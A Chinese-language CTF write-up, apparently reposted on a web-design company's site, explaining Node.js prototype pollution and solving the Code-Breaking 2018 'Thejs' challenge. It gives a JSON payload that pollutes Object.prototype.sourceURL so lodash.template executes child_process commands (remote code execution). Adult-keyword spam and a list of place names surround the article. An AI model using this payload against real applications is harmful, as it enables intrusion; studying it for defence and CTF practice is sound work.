成人午夜视频全免费观看高清-秋霞福利视频一区二区三区-国产精品久久久久电影小说-亚洲不卡区三一区三区一区

如何解析Node.js原型鏈污染的利用

如何解析Node.js原型鏈污染的利用,相信很多沒有經(jīng)驗的人對此束手無策,為此本文總結(jié)了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個問題。

茄子河網(wǎng)站制作公司哪家好,找創(chuàng)新互聯(lián)公司!從網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、成都響應(yīng)式網(wǎng)站建設(shè)公司等網(wǎng)站項目制作,到程序開發(fā),運營維護(hù)。創(chuàng)新互聯(lián)公司成立與2013年到現(xiàn)在10年的時間,我們擁有了豐富的建站經(jīng)驗和運維經(jīng)驗,來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)公司。

0x00 前言

我將介紹在什么情況下原型鏈會被污染,以及通過ctf題來展示實際場景中如何去利用原型鏈污染。

0x01 哪些情況下原型鏈會被污染

修改一個對象的原型中的屬性,影響到新實例化出來的對象,使其帶上了我們給對象原型添加的屬性,這就是原型鏈污染,那么在實際應(yīng)用中哪些情況會存在原型鏈被污染的可能呢?

之前說過在JavaScript中對象就是鍵值對的集,并且我們試驗過這樣一段代碼:

var obj = {
   "name": "ErDogQAQ",
   "team": "ATL"
}

console.log(obj.name);
console.log(obj.team);
console.log(obj);

如何解析Node.js原型鏈污染的利用

發(fā)現(xiàn)了對象中存在一個名為__proto__的鍵,而他就指向他構(gòu)造函數(shù)的原型,我們后面也通過A.__proto__.a = 2;這樣修改這個鍵的值的方式造成了原型鏈污染,呢么我們也就有思路了,只要找到那些我們能夠控制數(shù)組(也就是對象)的鍵名的操作,我們就可以通過修改鍵名為__proto__并控制它的值的方式來造成原型鏈污染。

在實際中能夠進(jìn)行這種參數(shù)的函數(shù)一般有:

  • 對象合并(merge);

  • 對象克?。╟lone)(本質(zhì)還是將一個對象合并到空對象中)

我們以合并為例,先搞一個merge函數(shù):

function merge(target, source) {
   for (let key in source) {
       if (key in source && key in target) {
           merge(target[key], source[key])
      } else {
           target[key] = source[key]
      }
  }
}

在合并的過程中存在賦值的操作:target[key] = source[key]那么我們將key改為__proto__是不是就可以原型鏈污染了呢?我們用代碼來實驗一下:

let o1 = {}
let o2 = {a: 1, "__proto__": {b: 2}}
merge(o1, o2)
console.log(o1.a, o1.b)
o3 = {}
console.log(o3.b)
console.log(o2)

如何解析Node.js原型鏈污染的利用

可以看到,合并確實成功了,o1本來是空對象,現(xiàn)在已經(jīng)有了屬性a和b,但是原型鏈并沒有被污染,新構(gòu)造的對象o3并沒有帶上我們預(yù)想的屬性b。

我們來分析一下原因,隨后查看對象o2發(fā)現(xiàn),在我們創(chuàng)建o2的時候,__proto__已將代表了o2的原型,此時去遍歷o2的所有鍵名拿到的值是[a,b],而__proto__并沒有作為鍵名被賦值,所以我們并沒有修改Object的原型。

那么我們?nèi)绾尾拍茏?code>__protp__被認(rèn)為是一個鍵名呢?答案是利用JSON解析。

我們修改一下代碼:

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)
o3 = {}
console.log(o3.b)
console.log(o2)

如何解析Node.js原型鏈污染的利用

可以看到這次新建的o3對象已經(jīng)帶上了b屬性,說明Object已經(jīng)被污染,同樣我們看o2對象時也可以看到,__proto__也被認(rèn)為是一個鍵名了。

這是因為,JSON解析的情況下,__proto__會被認(rèn)為是一個真正的“鍵名”,而不代表“原型”,所以在遍歷o2的時候會存在這個鍵。

merge操作是最常見可能控制鍵名的操作,也最能被原型鏈攻擊,很多常見的庫都存在這個問題。

下面我們就開始結(jié)合ctf中的題目進(jìn)行實際分析。

0x02 搭建調(diào)試環(huán)境

通常在ctf中原型鏈污染的題目都會直接給出源碼,并且源碼通常都比較長,直接去看并不能很好的理解代碼,所以需要本地搭建一個環(huán)境來方便我們本地嘗試以及動態(tài)調(diào)試。

這里以Code-Breaking 2018的Thejs這一題為例。

下載node.js:

這個就不多解釋了直接去官網(wǎng)下載并安裝就可以了。

如何解析Node.js原型鏈污染的利用

安裝完后直接在cmd下輸入node命令就可以像python一樣進(jìn)入命令交互模式了。

下載源碼:

https://github.com/phith0n/code-breaking/tree/master/2018/thejs/web

安裝依賴包:

在cmd中進(jìn)入源碼所在的目錄,然后直接執(zhí)行npm install命令就可以自動安裝所需的依賴包了。

如何解析Node.js原型鏈污染的利用

安裝完后可以看到他提示我們發(fā)現(xiàn)了4個漏洞,可以運行npm audit fix進(jìn)行修復(fù),或運行npm audit獲取詳細(xì)信息。

這里我們就運行npm audit看一下詳細(xì)信息:

如何解析Node.js原型鏈污染的利用

可以看到它告訴我們在lodash這個包中有4個原型污染漏洞,這正是我們需要利用的地方所以一會我們就著重看與lodash相關(guān)的代碼就可以了。(注意這里版本是4.17.4,在新版本中漏洞已經(jīng)被修復(fù))

調(diào)試:

這里我使用VS Code 進(jìn)行調(diào)試,打開VS Code后點擊打開文件夾,打開源碼所在目錄,打開server.js然后點擊左邊的運行/調(diào)試按鈕,點擊創(chuàng)建 launch.json 文件,選擇環(huán)境為node.js

如何解析Node.js原型鏈污染的利用

然后就會自動在目錄下生成一個.vscode文件夾里面有一個launch.json文件,檢查program是否為server.js,沒有問題直接點擊啟動程序就能夠正常啟動或者斷點調(diào)試了。

如何解析Node.js原型鏈污染的利用

0x03 嘗試解題

我們先看一下題目源碼:

const fs = require('fs')
const express = require('express')
const bodyParser = require('body-parser')
const lodash = require('lodash')
const session = require('express-session')
const randomize = require('randomatic')

const app = express()
app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())
app.use('/static', express.static('static'))
app.use(session({
    name: 'thejs.session',
    secret: randomize('aA0', 16),
    resave: false,
    saveUninitialized: false
}))
app.engine('ejs', function (filePath, options, callback) { // define the template engine
    fs.readFile(filePath, (err, content) => {
        if (err) return callback(new Error(err))
        let compiled = lodash.template(content)
        let rendered = compiled({...options})

        return callback(null, rendered)
    })
})
app.set('views', './views')
app.set('view engine', 'ejs')

app.all('/', (req, res) => {
    let data = req.session.data || {language: [], category: []}
    if (req.method == 'POST') {
        data = lodash.merge(data, req.body)
        req.session.data = data
    }
    
    res.render('index', {
        language: data.language, 
        category: data.category
    })
})

app.listen(3000, () => console.log(`Example app listening on port 3000!`))

剛才已經(jīng)知道了lodash包中有反序列化漏洞,所以我們著重看與lodash相關(guān)的代碼和我們上傳數(shù)據(jù)的地方就可以了。

......
const lodash = require('lodash')
......
app.engine('ejs', function (filePath, options, callback) { // define the template engine
    fs.readFile(filePath, (err, content) => {
        if (err) return callback(new Error(err))
        let compiled = lodash.template(content)
        let rendered = compiled({...options})

        return callback(null, rendered)
    })
})
......
app.all('/', (req, res) => {
    let data = req.session.data || {language: [], category: []}
    if (req.method == 'POST') {
        data = lodash.merge(data, req.body)		
        req.session.data = data
    }

    res.render('index', {
        language: data.language, 
        category: data.category
    })
})

我們可以看到與lodash相關(guān)的代碼有兩句:

let compiled = lodash.template(content)
data = lodash.merge(data, req.body)

查詢官方文檔后知道

lodash.template的作用:

如何解析Node.js原型鏈污染的利用

簡單理解就是一個簡單的模板引擎,會將content內(nèi)容放進(jìn)模板渲染。

lodash.merge的作用:

如何解析Node.js原型鏈污染的利用

這個不用多解釋,就是我們?nèi)账家瓜氲膶ο蠛喜⒑瘮?shù)了,能夠污染原型鏈的十有八九就是這里了。

那么我們就來試試是否真的能夠污染原型鏈:

我們在代碼中下好斷點,然后提交參數(shù)。

●  if (req.method == 'POST') {           //在這里下斷點
       data = lodash.merge(data, req.body)
       req.session.data = data
  }

這里還需要注意,直接提交是不能造成原型鏈污染的,因為我們之前也試過了,只有在JSON解析的情況下__proto__才會被認(rèn)為是一個鍵名,才能夠造成原型鏈污染。那么我們?nèi)绾尾拍茏屛覀儌魅氲膮?shù)按照J(rèn)SON解析呢?

這里我們在代碼中看到const app = express()題目使用的是express框架,而express框架支持根據(jù)Content-Type來解析請求Body,所以我們只需要將Content-Type改為application/json即可。

我們提交一個參數(shù):{"__proto__":{"A":"ATL"}}看看到底會不會造成原型鏈污染:

如何解析Node.js原型鏈污染的利用

提交后我們將代碼步過到merge函數(shù)處理之后:

如何解析Node.js原型鏈污染的利用

可以看到經(jīng)過merge函數(shù)處理data的原型也就是Object中果然帶上了A屬性,證明了此處存在原型鏈污染漏洞。

那么我們現(xiàn)在找到了能夠污染原型鏈的地方,接下來就要想想如何利用了,我們又想起了template函數(shù)的官方文檔中寫了可以使用sourceURLs進(jìn)行調(diào)試,那我們就跟進(jìn)template函數(shù)看看:

// Use a sourceURL for easier debugging.
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';
......
var result = attempt(function() {
  return Function(importsKeys, sourceURL + 'return ' + source)
  .apply(undefined, importsValues);
});

可以看到先是判斷options中是否有屬性sourceURL,如果有就進(jìn)行拼接,沒有則為空,然后將這個值拼接進(jìn)new Function的第二個參數(shù)。

那么我們現(xiàn)在就有思路了,我們可以利用原型鏈污染,給Object中插入一個sourceURL屬性,當(dāng)執(zhí)行到template中時,判斷options中原本是沒有sourceURL的,但是因為JavaScript的查找機制會一直向上查找,查到Object中時找到了sourceURL,然后就會拼接進(jìn)new Function造成任意代碼執(zhí)行。

有了攻擊思路,那么我們就來構(gòu)造payload測試:

{"__proto__":{"sourceURL": "\u000areturn e => { for (var a in {}) {delete Object.prototype[a]; } return global.process.mainModule.constructor._load('child_process').execSync('whoami')}\u000a// "}}

如何解析Node.js原型鏈污染的利用

提交后我們還是回來看調(diào)試信息:

如何解析Node.js原型鏈污染的利用

可以看到經(jīng)過merge函數(shù)處理,Object中已經(jīng)帶上了sourceURL屬性,我們到template函數(shù)時步入在看看能否獲取到sourceURL屬性:

如何解析Node.js原型鏈污染的利用

在這里步入:

如何解析Node.js原型鏈污染的利用

可以看到這里sourceURL有值說明這里成功獲取到了sourceURL屬性,那么我們最后看一下執(zhí)行結(jié)果:

如何解析Node.js原型鏈污染的利用

可以看到,成功執(zhí)行了命令。到此我們就進(jìn)行了一次完整的原型鏈污染利用。

看完上述內(nèi)容,你們掌握如何解析Node.js原型鏈污染的利用的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!

本文名稱:如何解析Node.js原型鏈污染的利用
文章出自:http://jinyejixie.com/article38/igoopp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供微信公眾號做網(wǎng)站、網(wǎng)站收錄、企業(yè)建站搜索引擎優(yōu)化、自適應(yīng)網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

網(wǎng)站建設(shè)網(wǎng)站維護(hù)公司
察雅县| 湄潭县| 大竹县| 永安市| 灵川县| 广安市| 沾益县| 西峡县| 广安市| 岳西县| 无极县| 大名县| 工布江达县| 安西县| 屯昌县| 建瓯市| 托克逊县| 南丰县| 平南县| 扎鲁特旗| 信阳市| 周至县| 基隆市| 二连浩特市| 屏东县| 南昌市| 桃江县| 宜宾市| 娱乐| 房产| 阿克苏市| 方山县| 竹溪县| 南溪县| 延津县| 浦县| 襄城县| 忻城县| 安义县| 潞城市| 南投县|